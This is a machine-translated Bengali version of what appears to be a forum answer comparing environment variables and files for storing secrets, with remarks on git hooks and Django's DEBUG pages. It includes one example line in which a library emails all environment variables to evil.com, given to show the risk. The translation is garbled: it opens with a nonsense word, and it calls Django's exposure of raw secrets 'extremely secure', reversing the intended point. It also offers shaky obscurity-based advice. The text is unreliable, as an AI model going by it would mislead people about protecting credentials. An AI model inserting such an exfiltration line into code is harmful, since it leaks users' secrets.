আফ্রিকান, দুটি কারণের কারণে মানুষ পরিবেশের ভেরিয়েবলগুলিতে গোপনীয়তা সংরক্ষণের পরামর্শ দেয়:
- অজ্ঞাতসারে কোনও রেপোতে গোপন ফ্ল্যাট ফাইলগুলি সংঘবদ্ধ করা খুব সহজ। (এবং এটি যদি সর্বজনীন রেপো হয় তবে আপনি টোস্ট।
- এটি পাসওয়ার্ড বিশৃঙ্খলা প্রতিরোধ করে অর্থাত্, বিভিন্ন প্রকল্পের ডিরেক্টরি ফাইলগুলিতে একই কী থাকা নিজেই একটি সুরক্ষা ঝুঁকি কারণ অবশেষে বিকাশকারীরা কোথায় সিক্রেটস রয়েছে তা ট্র্যাক হারিয়ে ফেলবে।
এই দুটি সমস্যা আরও ভাল উপায়ে সমাধান করা যেতে পারে। প্রাক্তনটির একটি গিট কমিট হুক দ্বারা সমাধান করা উচিত যা পাসওয়ার্ডের মতো দেখতে (যেমন, গিটলিকস ) দেখতে পাওয়া জিনিসগুলি পরীক্ষা করে । আমি চাই লিনাস গিট লাইব্রেরির সোর্স কোডে এমন একটি সরঞ্জাম তৈরি করেছিলেন তবে হায় আফসোস, এটি হয়নি। (এটি বলাই বাহুল্য, গোপন ফাইলগুলি সর্বদা যুক্ত করা উচিত .gitignore
, তবে কেউ যদি এটি করতে ভুলে যায় তবে আপনার একটি হুক দরকার)
পরেরটি একটি বিশ্বব্যাপী সংস্থা সিক্রেটস ফাইল থাকার মাধ্যমে সমাধান করা যেতে পারে, যা আদর্শভাবে কেবল পঠনযোগ্য শেয়ার্ড ড্রাইভে সংরক্ষণ করা হয়। সুতরাং, পাইথনে, আপনার মতো কিছু থাকতে পারে from company_secrets import *
।
আরও গুরুত্বপূর্ণ, অন্যদের দ্বারা চিহ্নিত হিসাবে, এটি পরিবেশের ভেরিয়েবলগুলিতে সঞ্চিত গোপনীয়াগুলি হ্যাক করা সহজ। উদাহরণস্বরূপ, পাইথনে, একটি লাইব্রেরির লেখক সন্নিবেশ করতে পারে send_email(address="evil.person@evil.com", text=json.dumps(os.environ))
এবং আপনি এই কোডটি সম্পাদন করেন তবে আপনার টোস্ট হয়। আপনার সিস্টেমে কল করা ফাইল থাকলে হ্যাকিং অনেক বেশি চ্যালেঞ্জিং ~/secret_company_stuff/.my_very_secret_company_stuff
।
জাঙ্গো কেবলমাত্র ব্যবহারকারী:
জ্যাঙ্গো (ডিইবিইউজি মোডে) যদি কোনও ব্যতিক্রম (ডিইবিইউজি মোডে) থাকে তবে ব্রাউজারে একটি পরিবেশের পরিবর্তনশীলের কাঁচা মান দেখায়। এটি অত্যন্ত সুরক্ষিত বলে মনে হয় যদি উদাহরণস্বরূপ, কোনও বিকাশকারী ঘটনাক্রমে DEBUG=True
উত্পাদনে সেট করে। এর বিপরীতে, জ্যাঙ্গো স্ট্রিং খুঁজছেন দ্বারা অস্পষ্ট পাসওয়ার্ড সেটিংস ভেরিয়েবল শুরু করে API
, TOKEN
, KEY
, SECRET
, PASS
বা SIGNATURE
ফ্রেমওয়ার্ক এর settings.py
ফাইলের পরিবর্তনশীল নাম থাকবে না।